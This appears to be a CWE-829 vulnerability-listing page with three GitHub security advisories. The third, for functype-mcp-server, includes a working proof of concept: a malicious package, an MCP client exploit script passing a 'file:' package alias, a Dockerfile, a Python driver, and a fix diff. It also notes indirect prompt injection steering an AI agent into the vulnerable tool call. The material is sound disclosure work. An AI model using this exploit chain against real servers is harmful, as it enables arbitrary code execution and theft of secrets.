CWE-829
AllowedInclusion of Functionality from Untrusted Control Sphere
Abstraction: Base · Status: Incomplete
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
502 vulnerabilities reference this CWE, most recent first.
GHSA-W4GP-QV48-5JC9
Vulnerability from github – Published: 2022-07-21 00:00 – Updated: 2026-01-09 06:31Inclusion of Functionality from Untrusted Control Sphere vulnerability in ICONICS GENESIS64 versions 10.97.1 and prior and Mitsubishi Electric MC Works64 versions 4.04E (10.95.210.01) and prior allows an unauthenticated attacker to execute an arbitrary malicious code by leading a user to load a monitoring screen file including malicious script codes.
{
"affected": [],
"aliases": [
"CVE-2022-33317"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-20T17:15:00Z",
"severity": "HIGH"
},
"details": "Inclusion of Functionality from Untrusted Control Sphere vulnerability in ICONICS GENESIS64 versions 10.97.1 and prior and Mitsubishi Electric MC Works64 versions 4.04E (10.95.210.01) and prior allows an unauthenticated attacker to execute an arbitrary malicious code by leading a user to load a monitoring screen file including malicious script codes.",
"id": "GHSA-w4gp-qv48-5jc9",
"modified": "2026-01-09T06:31:04Z",
"published": "2022-07-21T00:00:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33317"
},
{
"type": "WEB",
"url": "https://jvn.jp/vu/JVNVU96480474/index.html"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-202-04"
},
{
"type": "WEB",
"url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2022-008_en.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-W7H5-55JG-CQ2F
Vulnerability from github – Published: 2026-02-18 21:45 – Updated: 2026-02-20 16:48Impact
This is a remote code execution (RCE) vulnerability. Node.js automatically imports **/*.plugin.{js,mjs} files including those from node_modules, so any malicious package with a .plugin.js file could execute arbitrary code when installed or required. All projects using this loading behavior are affected, especially those installing untrusted packages.
Patches
The issue has been patched in v0.0.5. Users should upgrade to v0.0.5 or later to mitigate the vulnerability.
Workarounds
- Audit and restrict which packages are installed in
node_modules.
References
- CWE-94: Improper Control of Generation of Code
- GitHub Security Advisories documentation: https://docs.github.com/en/code-security/security-advisories
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@tygo-van-den-hurk/slyde"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26974"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T21:45:06Z",
"nvd_published_at": "2026-02-20T01:16:00Z",
"severity": "HIGH"
},
"details": "### Impact\nThis is a **remote code execution (RCE) vulnerability**. Node.js automatically imports `**/*.plugin.{js,mjs}` files including those from `node_modules`, so any malicious package with a `.plugin.js` file could execute arbitrary code when installed or required. **All projects using this loading behavior are affected**, especially those installing untrusted packages.\n\n### Patches\nThe issue has been **patched in v0.0.5**. Users should upgrade to **v0.0.5 or later** to mitigate the vulnerability.\n\n### Workarounds\n- Audit and restrict which packages are installed in `node_modules`.\n\n### References\n- [CWE-94: Improper Control of Generation of Code](https://cwe.mitre.org/data/definitions/94.html) \n- GitHub Security Advisories documentation: [https://docs.github.com/en/code-security/security-advisories](https://docs.github.com/en/code-security/security-advisories)",
"id": "GHSA-w7h5-55jg-cq2f",
"modified": "2026-02-20T16:48:00Z",
"published": "2026-02-18T21:45:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26974"
},
{
"type": "WEB",
"url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60"
},
{
"type": "PACKAGE",
"url": "https://github.com/Tygo-van-den-Hurk/Slyde"
},
{
"type": "WEB",
"url": "https://github.com/Tygo-van-den-Hurk/Slyde/releases/tag/v0.0.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Improper Control of Generation of Code (\u0027Code Injection\u0027) in @tygo-van-den-hurk/slyde"
}
GHSA-WCJJ-9M6G-2FR2
Vulnerability from github – Published: 2026-09-09 23:49 – Updated: 2026-09-09 23:49MCP set_functype_version Package Alias RCE via Unsanitized pnpm install + Dynamic Import
Summary
The set_functype_version MCP tool in functype-mcp-server accepts an unconstrained version string, interpolates it directly into an npm package specifier (functype@<version>), and installs it via pnpm add without any validation. Because npm/pnpm package specifiers support file:, npm:, and other alias syntaxes, an attacker who can send an MCP tools/call request to this tool can cause the server to install an arbitrary local or remote package as functype. Immediately after installation, the server calls initDocsData(true), which dynamically imports functype/cli from the newly installed location, executing attacker-controlled JavaScript in the MCP server process. This results in full Remote Code Execution (RCE) with the privileges of the server process — full confidentiality, integrity, and availability impact (CVSS 7.8 High).
Details
The vulnerable code is in packages/mcp-server/src/index.ts. The set_functype_version tool is registered at line 115 and is enabled by default (no authentication required in stdio mode).
Source (user input accepted without validation):
// packages/mcp-server/src/index.ts:119-121
parameters: z.object({
version: z.string().describe('The functype version to install (e.g., "0.46.0", "latest", "^0.45.0")'),
}),
Only z.string() validation is applied — no semver format check, no allowlist for dist-tags, and no rejection of file:, npm:, URL, or path alias syntaxes.
Sink 1 — arbitrary package installation:
// packages/mcp-server/src/index.ts:122-125
execute: async (args) => {
const spec = `functype@${args.version}`
try {
execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
args.version is interpolated into the package specifier string and passed directly to pnpm add. Supplying file:/path/to/evil causes pnpm to install an attacker-controlled directory as the functype package alias.
Sink 2 — dynamic import executes installed package code:
// packages/mcp-server/src/lib/docs/data.ts:23-30
if (force) {
const resolvedPath = require.resolve("functype/cli")
cli = await import(`${pathToFileURL(resolvedPath).href}?t=${Date.now()}`)
}
initDocsData(true) is called immediately after installation (line 134 in index.ts). It resolves functype/cli from the node_modules that now points to the attacker's package and dynamically imports it, executing any module-level code in the attacker's cli.js at import time.
Data flow summary:
1. index.ts:115 — MCP tool set_functype_version registered, no auth required.
2. index.ts:119-121 — version accepted as raw z.string() (source).
3. index.ts:123 — functype@${args.version} constructed without sanitization.
4. index.ts:125 — execFileSync("pnpm", ["add", spec], ...) installs attacker-controlled package (sink: arbitrary install).
5. index.ts:134 — initDocsData(true) called immediately.
6. data.ts:29-30 — require.resolve("functype/cli") + dynamic import() executes attacker module (sink: RCE).
PoC
Step 1 — Prepare the attacker-controlled evil package:
mkdir -p /tmp/evil
cat > /tmp/evil/package.json <<'EOF'
{"name":"evil-functype","version":"1.0.0","type":"module","exports":{"./cli":"./cli.js"}}
EOF
cat > /tmp/evil/cli.js <<'EOF'
import { writeFileSync } from "node:fs";
writeFileSync("/pwned.txt", "RCE: mcp import-time code execution via set_functype_version\n");
export const TYPES = {};
export const INTERFACES = {};
export const CATEGORIES = {};
export const FULL_INTERFACES = {};
export const VERSION = "1.0.0";
EOF
Step 2 — Clone and build the victim monorepo at the affected version:
TMP="$(mktemp -d)"
git clone https://github.com/jordanburke/functype.git "$TMP/functype"
cd "$TMP/functype"
git checkout v1.4.3
corepack enable
pnpm install --frozen-lockfile
pnpm -F functype build
pnpm -F functype-mcp-server build
Step 3 — Set up an MCP client to deliver the exploit:
cd "$TMP"
npm init -y
npm pkg set type=module
npm install @modelcontextprotocol/sdk
cat > exploit.mjs <<'EOF'
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
const client = new Client({ name: "poc", version: "1.0.0" });
const transport = new StdioClientTransport({
command: "node",
args: [`${process.env.REPO}/packages/mcp-server/dist/bin.js`],
env: { ...process.env, TRANSPORT_TYPE: "stdio" },
});
await client.connect(transport);
const result = await client.callTool({
name: "set_functype_version",
arguments: { version: "file:/tmp/evil" },
});
console.log(result);
await client.close();
EOF
REPO="$TMP/functype" node exploit.mjs
Step 4 — Verify arbitrary code execution:
cat /pwned.txt
# Expected output: RCE: mcp import-time code execution via set_functype_version
Dynamic reproduction (Docker):
The Phase 2 dynamic test used the provided Dockerfile which automates the above steps inside a container. The container confirmed creation of /pwned.txt with the expected payload string, proving end-to-end RCE.
[poc] EXPLOIT SUCCEEDED: /pwned.txt exists
[poc] File contents: RCE: mcp import-time code execution via set_functype_version
[evil-payload] Arbitrary code executed via functype/cli dynamic import
Recommended remediation:
+const SAFE_FUNCTYPE_VERSION = /^(?:latest|next|beta|alpha|canary|rc|[~^]?v?\d+(?:\.\d+){0,2}(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)$/
+
+const isSafeFunctypeVersion = (version: string): boolean => {
+ const trimmed = version.trim()
+ return trimmed === version && SAFE_FUNCTYPE_VERSION.test(trimmed) && !/[/:\\@]/.test(trimmed)
+}
execute: async (args) => {
- const spec = `functype@${args.version}`
+ if (!isSafeFunctypeVersion(args.version)) {
+ return "Invalid functype version. Use a semver version, range prefix (^ or ~), or a known dist-tag."
+ }
+ const spec = `functype@${args.version}`
try {
- execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
+ execFileSync("pnpm", ["add", "--ignore-scripts", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
Impact
This is a Remote Code Execution (RCE) vulnerability. Any MCP client that can invoke the set_functype_version tool — which requires no authentication and is enabled by default in the stdio MCP server — can execute arbitrary JavaScript in the MCP server process.
Who is impacted:
- Developers and teams running functype-mcp-server (version 1.4.3) in their local or CI environments as an AI coding assistant integration.
- Users whose AI assistant (LLM agent) is connected to this MCP server and is susceptible to indirect prompt injection: a malicious document or web page read by the AI could trigger a set_functype_version call with a file: or npm: alias payload.
- In non-default TRANSPORT_TYPE=httpStream deployments, network-accessible attackers can exploit this without local access.
The full impact at exploitation is confidentiality, integrity, and availability — an attacker can read secrets from the process environment, modify files, or crash the server.
Reproduction artifacts
Dockerfile
# Dockerfile for VULN-001: MCP set_functype_version Package Alias RCE
#
# Build context: reports/npmAI_684_jordanburke__functype/
# COPY repo/ -> /workspace/functype/ (victim monorepo)
# COPY vuln-001/ -> supporting PoC files
#
# Build: docker build -t vuln001-functype-rce -f vuln-001/Dockerfile .
# Run: docker run --rm vuln001-functype-rce
#
# Expected exit 0 with "[poc] EXPLOIT SUCCEEDED" in output.
FROM node:24-slim
# Install pnpm matching the repo's packageManager field (pnpm@11.7.0).
RUN npm install -g pnpm@11.7.0 --quiet
# ── Victim workspace ──────────────────────────────────────────────────────────
WORKDIR /workspace/functype
COPY repo/ ./
# Install all workspace deps. --no-frozen-lockfile avoids hash mismatches
# caused by running on a different pnpm minor than the one that generated the
# lockfile; the installed versions are still constrained by the lockfile
# specifiers for the packages we care about.
RUN pnpm install --no-frozen-lockfile
# Build functype first (mcp-server externals functype at build time).
RUN pnpm -F functype build
# Build the MCP server binary (output: packages/mcp-server/dist/bin.js).
RUN pnpm -F functype-mcp-server build
# ── Attacker-controlled evil package ─────────────────────────────────────────
# /evil/cli.js writes /pwned.txt when dynamically imported.
COPY vuln-001/evil/ /evil/
# ── MCP exploit client ────────────────────────────────────────────────────────
WORKDIR /client
RUN npm init -y --quiet && \
npm pkg set type=module && \
npm install @modelcontextprotocol/sdk@1.29.0 --quiet
COPY vuln-001/client/exploit.mjs ./exploit.mjs
# Default entrypoint: run the exploit and exit 0 on success.
CMD ["node", "/client/exploit.mjs"]
poc.py
#!/usr/bin/env python3
"""
PoC driver for VULN-001: MCP set_functype_version Package Alias RCE
via Unsanitized pnpm install + Dynamic Import (CWE-829, CVSS 7.8 High).
Attack chain:
1. Attacker calls MCP tool set_functype_version with version="file:/evil"
2. Server executes: execFileSync("pnpm", ["add", "functype@file:/evil"], ...)
3. Evil package is installed as the functype alias in mcp-server's node_modules
4. Server calls initDocsData(true) which resolves functype/cli and dynamic-imports it
5. /evil/cli.js runs at import time -> writes /pwned.txt (arbitrary code execution)
Usage:
python3 poc.py [--build-only]
Requirements:
- Docker daemon running
- Build context at parent directory of this file's directory
"""
import subprocess
import sys
import json
import os
import argparse
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
REPORT_DIR = os.path.dirname(VULN_DIR)
IMAGE_NAME = "vuln001-functype-rce"
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
RESULT_FILE = os.path.join(VULN_DIR, "phase2_result.json")
BUILD_CMD = ["docker", "build", "-t", IMAGE_NAME, "-f", DOCKERFILE, REPORT_DIR]
RUN_CMD = ["docker", "run", "--rm", IMAGE_NAME]
def run(cmd, timeout=None, **kwargs):
"""Run a command and return CompletedProcess with combined output."""
return subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=timeout,
**kwargs,
)
def write_result(passed, verdict, reason, evidence):
result = {
"passed": passed,
"verdict": verdict,
"reason": reason,
"build_command": " ".join(BUILD_CMD),
"run_command": " ".join(RUN_CMD),
"poc_command": f"python3 {os.path.basename(__file__)}",
"evidence": evidence,
"artifacts": ["Dockerfile", "poc.py", "evil/package.json", "evil/cli.js", "client/exploit.mjs"],
}
with open(RESULT_FILE, "w", encoding="utf-8") as f:
json.dump(result, f, indent=2, ensure_ascii=False)
print(f"[poc] Result written to {RESULT_FILE}")
print(f"[poc] verdict={verdict} passed={passed}")
def main():
parser = argparse.ArgumentParser(description="VULN-001 PoC driver")
parser.add_argument("--build-only", action="store_true", help="Only build the image, do not run")
args = parser.parse_args()
# ── Build ─────────────────────────────────────────────────────────────────
print("[poc] Building Docker image (this may take a few minutes)...")
print(f"[poc] Build command: {' '.join(BUILD_CMD)}")
try:
build = run(BUILD_CMD, timeout=900)
except subprocess.TimeoutExpired:
msg = "Docker build timed out after 900 seconds"
print(f"[poc] ERROR: {msg}")
write_result(False, "INCOMPLETE", f"빌드 타임아웃: {msg}", msg)
sys.exit(2)
if build.returncode != 0:
tail = (build.stdout + "\n" + build.stderr)[-3000:]
print("[poc] Build FAILED:")
print(tail)
write_result(
False,
"FAIL",
"Docker 이미지 빌드 실패. pnpm install 또는 TypeScript 빌드 오류 확인 필요.",
f"BUILD EXIT {build.returncode}\n{tail}",
)
sys.exit(1)
print("[poc] Build succeeded.")
if args.build_only:
print("[poc] --build-only flag set; skipping run.")
sys.exit(0)
# ── Run ───────────────────────────────────────────────────────────────────
print(f"[poc] Running exploit container: {' '.join(RUN_CMD)}")
try:
run_result = run(RUN_CMD, timeout=180)
except subprocess.TimeoutExpired:
msg = "Container run timed out after 180 seconds"
print(f"[poc] ERROR: {msg}")
write_result(False, "INCOMPLETE", f"컨테이너 실행 타임아웃: {msg}", msg)
sys.exit(2)
stdout = run_result.stdout or ""
stderr = run_result.stderr or ""
combined = stdout + "\n" + stderr
print("=" * 60)
print("STDOUT:")
print(stdout)
print("STDERR:")
print(stderr)
print(f"EXIT CODE: {run_result.returncode}")
print("=" * 60)
# Success criteria: exit 0 AND exploit succeeded message present
exploit_succeeded = "EXPLOIT SUCCEEDED" in combined
passed = run_result.returncode == 0 and exploit_succeeded
if passed:
# Extract key evidence lines
evidence_lines = [
line for line in combined.splitlines()
if any(kw in line for kw in ("EXPLOIT SUCCEEDED", "pwned.txt", "evil-payload", "RCE:"))
]
evidence = "\n".join(evidence_lines) if evidence_lines else combined[-1000:]
write_result(
True,
"PASS",
(
"컨테이너 내 /pwned.txt 생성 확인: MCP set_functype_version 도구에 "
'version="file:/evil" 인수를 전달하자 서버가 pnpm add functype@file:/evil을 실행한 후 '
"initDocsData(true)가 동적 import를 통해 evil/cli.js를 실행, 임의 파일 쓰기(RCE)가 발생함."
),
evidence,
)
print("[poc] === PASS: exploit reproduced ===")
sys.exit(0)
else:
# Distinguish failure modes
if not exploit_succeeded and run_result.returncode == 0:
verdict = "INCOMPLETE"
reason = (
"/pwned.txt가 생성되지 않았으나 컨테이너는 정상 종료됨. "
"pnpm add 후 require.resolve 경로 확인 필요 — pnpm 가상 스토어 구조로 인해 "
"node_modules/functype 심볼릭링크가 예상 위치에 없을 수 있음."
)
else:
verdict = "FAIL"
reason = (
f"컨테이너 종료 코드 {run_result.returncode}. "
"exploit.mjs 오류 또는 MCP 서버 시작 실패. 로그 확인 필요."
)
write_result(False, verdict, reason, combined[-2000:])
print(f"[poc] === {verdict}: exploit did not reproduce ===")
sys.exit(1)
if __name__ == "__main__":
main()
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.3"
},
"package": {
"ecosystem": "npm",
"name": "functype-mcp-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-59176"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-09T23:49:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## MCP `set_functype_version` Package Alias RCE via Unsanitized pnpm install + Dynamic Import\n\n### Summary\n\nThe `set_functype_version` MCP tool in `functype-mcp-server` accepts an unconstrained `version` string, interpolates it directly into an npm package specifier (`functype@\u003cversion\u003e`), and installs it via `pnpm add` without any validation. Because npm/pnpm package specifiers support `file:`, `npm:`, and other alias syntaxes, an attacker who can send an MCP `tools/call` request to this tool can cause the server to install an arbitrary local or remote package as `functype`. Immediately after installation, the server calls `initDocsData(true)`, which dynamically imports `functype/cli` from the newly installed location, executing attacker-controlled JavaScript in the MCP server process. This results in full Remote Code Execution (RCE) with the privileges of the server process \u2014 full confidentiality, integrity, and availability impact (CVSS 7.8 High).\n\n### Details\n\nThe vulnerable code is in `packages/mcp-server/src/index.ts`. The `set_functype_version` tool is registered at line 115 and is enabled by default (no authentication required in stdio mode).\n\n**Source (user input accepted without validation):**\n```ts\n// packages/mcp-server/src/index.ts:119-121\nparameters: z.object({\n version: z.string().describe(\u0027The functype version to install (e.g., \"0.46.0\", \"latest\", \"^0.45.0\")\u0027),\n}),\n```\nOnly `z.string()` validation is applied \u2014 no semver format check, no allowlist for dist-tags, and no rejection of `file:`, `npm:`, URL, or path alias syntaxes.\n\n**Sink 1 \u2014 arbitrary package installation:**\n```ts\n// packages/mcp-server/src/index.ts:122-125\nexecute: async (args) =\u003e {\n const spec = `functype@${args.version}`\n try {\n execFileSync(\"pnpm\", [\"add\", spec], { cwd: PROJECT_ROOT, stdio: \"pipe\", timeout: 60_000 })\n```\n`args.version` is interpolated into the package specifier string and passed directly to `pnpm add`. Supplying `file:/path/to/evil` causes pnpm to install an attacker-controlled directory as the `functype` package alias.\n\n**Sink 2 \u2014 dynamic import executes installed package code:**\n```ts\n// packages/mcp-server/src/lib/docs/data.ts:23-30\nif (force) {\n const resolvedPath = require.resolve(\"functype/cli\")\n cli = await import(`${pathToFileURL(resolvedPath).href}?t=${Date.now()}`)\n}\n```\n`initDocsData(true)` is called immediately after installation (line 134 in `index.ts`). It resolves `functype/cli` from the node_modules that now points to the attacker\u0027s package and dynamically imports it, executing any module-level code in the attacker\u0027s `cli.js` at import time.\n\n**Data flow summary:**\n1. `index.ts:115` \u2014 MCP tool `set_functype_version` registered, no auth required.\n2. `index.ts:119-121` \u2014 `version` accepted as raw `z.string()` (source).\n3. `index.ts:123` \u2014 `functype@${args.version}` constructed without sanitization.\n4. `index.ts:125` \u2014 `execFileSync(\"pnpm\", [\"add\", spec], ...)` installs attacker-controlled package (sink: arbitrary install).\n5. `index.ts:134` \u2014 `initDocsData(true)` called immediately.\n6. `data.ts:29-30` \u2014 `require.resolve(\"functype/cli\")` + dynamic `import()` executes attacker module (sink: RCE).\n\n### PoC\n\n**Step 1 \u2014 Prepare the attacker-controlled evil package:**\n```bash\nmkdir -p /tmp/evil\ncat \u003e /tmp/evil/package.json \u003c\u003c\u0027EOF\u0027\n{\"name\":\"evil-functype\",\"version\":\"1.0.0\",\"type\":\"module\",\"exports\":{\"./cli\":\"./cli.js\"}}\nEOF\ncat \u003e /tmp/evil/cli.js \u003c\u003c\u0027EOF\u0027\nimport { writeFileSync } from \"node:fs\";\nwriteFileSync(\"/pwned.txt\", \"RCE: mcp import-time code execution via set_functype_version\\n\");\nexport const TYPES = {};\nexport const INTERFACES = {};\nexport const CATEGORIES = {};\nexport const FULL_INTERFACES = {};\nexport const VERSION = \"1.0.0\";\nEOF\n```\n\n**Step 2 \u2014 Clone and build the victim monorepo at the affected version:**\n```bash\nTMP=\"$(mktemp -d)\"\ngit clone https://github.com/jordanburke/functype.git \"$TMP/functype\"\ncd \"$TMP/functype\"\ngit checkout v1.4.3\ncorepack enable\npnpm install --frozen-lockfile\npnpm -F functype build\npnpm -F functype-mcp-server build\n```\n\n**Step 3 \u2014 Set up an MCP client to deliver the exploit:**\n```bash\ncd \"$TMP\"\nnpm init -y\nnpm pkg set type=module\nnpm install @modelcontextprotocol/sdk\n\ncat \u003e exploit.mjs \u003c\u003c\u0027EOF\u0027\nimport { Client } from \"@modelcontextprotocol/sdk/client/index.js\";\nimport { StdioClientTransport } from \"@modelcontextprotocol/sdk/client/stdio.js\";\n\nconst client = new Client({ name: \"poc\", version: \"1.0.0\" });\nconst transport = new StdioClientTransport({\n command: \"node\",\n args: [`${process.env.REPO}/packages/mcp-server/dist/bin.js`],\n env: { ...process.env, TRANSPORT_TYPE: \"stdio\" },\n});\n\nawait client.connect(transport);\nconst result = await client.callTool({\n name: \"set_functype_version\",\n arguments: { version: \"file:/tmp/evil\" },\n});\nconsole.log(result);\nawait client.close();\nEOF\n\nREPO=\"$TMP/functype\" node exploit.mjs\n```\n\n**Step 4 \u2014 Verify arbitrary code execution:**\n```bash\ncat /pwned.txt\n# Expected output: RCE: mcp import-time code execution via set_functype_version\n```\n\n**Dynamic reproduction (Docker):**\n\nThe Phase 2 dynamic test used the provided Dockerfile which automates the above steps inside a container. The container confirmed creation of `/pwned.txt` with the expected payload string, proving end-to-end RCE.\n\n```\n[poc] EXPLOIT SUCCEEDED: /pwned.txt exists\n[poc] File contents: RCE: mcp import-time code execution via set_functype_version\n[evil-payload] Arbitrary code executed via functype/cli dynamic import\n```\n\n**Recommended remediation:**\n```diff\n+const SAFE_FUNCTYPE_VERSION = /^(?:latest|next|beta|alpha|canary|rc|[~^]?v?\\d+(?:\\.\\d+){0,2}(?:-[0-9A-Za-z.-]+)?(?:\\+[0-9A-Za-z.-]+)?)$/\n+\n+const isSafeFunctypeVersion = (version: string): boolean =\u003e {\n+ const trimmed = version.trim()\n+ return trimmed === version \u0026\u0026 SAFE_FUNCTYPE_VERSION.test(trimmed) \u0026\u0026 !/[/:\\\\@]/.test(trimmed)\n+}\n\n execute: async (args) =\u003e {\n- const spec = `functype@${args.version}`\n+ if (!isSafeFunctypeVersion(args.version)) {\n+ return \"Invalid functype version. Use a semver version, range prefix (^ or ~), or a known dist-tag.\"\n+ }\n+ const spec = `functype@${args.version}`\n try {\n- execFileSync(\"pnpm\", [\"add\", spec], { cwd: PROJECT_ROOT, stdio: \"pipe\", timeout: 60_000 })\n+ execFileSync(\"pnpm\", [\"add\", \"--ignore-scripts\", spec], { cwd: PROJECT_ROOT, stdio: \"pipe\", timeout: 60_000 })\n```\n\n### Impact\n\nThis is a **Remote Code Execution (RCE)** vulnerability. Any MCP client that can invoke the `set_functype_version` tool \u2014 which requires no authentication and is enabled by default in the stdio MCP server \u2014 can execute arbitrary JavaScript in the MCP server process.\n\n**Who is impacted:**\n- Developers and teams running `functype-mcp-server` (version 1.4.3) in their local or CI environments as an AI coding assistant integration.\n- Users whose AI assistant (LLM agent) is connected to this MCP server and is susceptible to indirect prompt injection: a malicious document or web page read by the AI could trigger a `set_functype_version` call with a `file:` or `npm:` alias payload.\n- In non-default `TRANSPORT_TYPE=httpStream` deployments, network-accessible attackers can exploit this without local access.\n\nThe full impact at exploitation is confidentiality, integrity, and availability \u2014 an attacker can read secrets from the process environment, modify files, or crash the server.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# Dockerfile for VULN-001: MCP set_functype_version Package Alias RCE\n#\n# Build context: reports/npmAI_684_jordanburke__functype/\n# COPY repo/ -\u003e /workspace/functype/ (victim monorepo)\n# COPY vuln-001/ -\u003e supporting PoC files\n#\n# Build: docker build -t vuln001-functype-rce -f vuln-001/Dockerfile .\n# Run: docker run --rm vuln001-functype-rce\n#\n# Expected exit 0 with \"[poc] EXPLOIT SUCCEEDED\" in output.\n\nFROM node:24-slim\n\n# Install pnpm matching the repo\u0027s packageManager field (pnpm@11.7.0).\nRUN npm install -g pnpm@11.7.0 --quiet\n\n# \u2500\u2500 Victim workspace \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nWORKDIR /workspace/functype\nCOPY repo/ ./\n\n# Install all workspace deps. --no-frozen-lockfile avoids hash mismatches\n# caused by running on a different pnpm minor than the one that generated the\n# lockfile; the installed versions are still constrained by the lockfile\n# specifiers for the packages we care about.\nRUN pnpm install --no-frozen-lockfile\n\n# Build functype first (mcp-server externals functype at build time).\nRUN pnpm -F functype build\n\n# Build the MCP server binary (output: packages/mcp-server/dist/bin.js).\nRUN pnpm -F functype-mcp-server build\n\n# \u2500\u2500 Attacker-controlled evil package \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n# /evil/cli.js writes /pwned.txt when dynamically imported.\nCOPY vuln-001/evil/ /evil/\n\n# \u2500\u2500 MCP exploit client \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nWORKDIR /client\nRUN npm init -y --quiet \u0026\u0026 \\\n npm pkg set type=module \u0026\u0026 \\\n npm install @modelcontextprotocol/sdk@1.29.0 --quiet\nCOPY vuln-001/client/exploit.mjs ./exploit.mjs\n\n# Default entrypoint: run the exploit and exit 0 on success.\nCMD [\"node\", \"/client/exploit.mjs\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC driver for VULN-001: MCP set_functype_version Package Alias RCE\nvia Unsanitized pnpm install + Dynamic Import (CWE-829, CVSS 7.8 High).\n\nAttack chain:\n 1. Attacker calls MCP tool set_functype_version with version=\"file:/evil\"\n 2. Server executes: execFileSync(\"pnpm\", [\"add\", \"functype@file:/evil\"], ...)\n 3. Evil package is installed as the functype alias in mcp-server\u0027s node_modules\n 4. Server calls initDocsData(true) which resolves functype/cli and dynamic-imports it\n 5. /evil/cli.js runs at import time -\u003e writes /pwned.txt (arbitrary code execution)\n\nUsage:\n python3 poc.py [--build-only]\n\nRequirements:\n - Docker daemon running\n - Build context at parent directory of this file\u0027s directory\n\"\"\"\n\nimport subprocess\nimport sys\nimport json\nimport os\nimport argparse\n\nVULN_DIR = os.path.dirname(os.path.abspath(__file__))\nREPORT_DIR = os.path.dirname(VULN_DIR)\nIMAGE_NAME = \"vuln001-functype-rce\"\nDOCKERFILE = os.path.join(VULN_DIR, \"Dockerfile\")\nRESULT_FILE = os.path.join(VULN_DIR, \"phase2_result.json\")\n\nBUILD_CMD = [\"docker\", \"build\", \"-t\", IMAGE_NAME, \"-f\", DOCKERFILE, REPORT_DIR]\nRUN_CMD = [\"docker\", \"run\", \"--rm\", IMAGE_NAME]\n\n\ndef run(cmd, timeout=None, **kwargs):\n \"\"\"Run a command and return CompletedProcess with combined output.\"\"\"\n return subprocess.run(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True,\n timeout=timeout,\n **kwargs,\n )\n\n\ndef write_result(passed, verdict, reason, evidence):\n result = {\n \"passed\": passed,\n \"verdict\": verdict,\n \"reason\": reason,\n \"build_command\": \" \".join(BUILD_CMD),\n \"run_command\": \" \".join(RUN_CMD),\n \"poc_command\": f\"python3 {os.path.basename(__file__)}\",\n \"evidence\": evidence,\n \"artifacts\": [\"Dockerfile\", \"poc.py\", \"evil/package.json\", \"evil/cli.js\", \"client/exploit.mjs\"],\n }\n with open(RESULT_FILE, \"w\", encoding=\"utf-8\") as f:\n json.dump(result, f, indent=2, ensure_ascii=False)\n print(f\"[poc] Result written to {RESULT_FILE}\")\n print(f\"[poc] verdict={verdict} passed={passed}\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"VULN-001 PoC driver\")\n 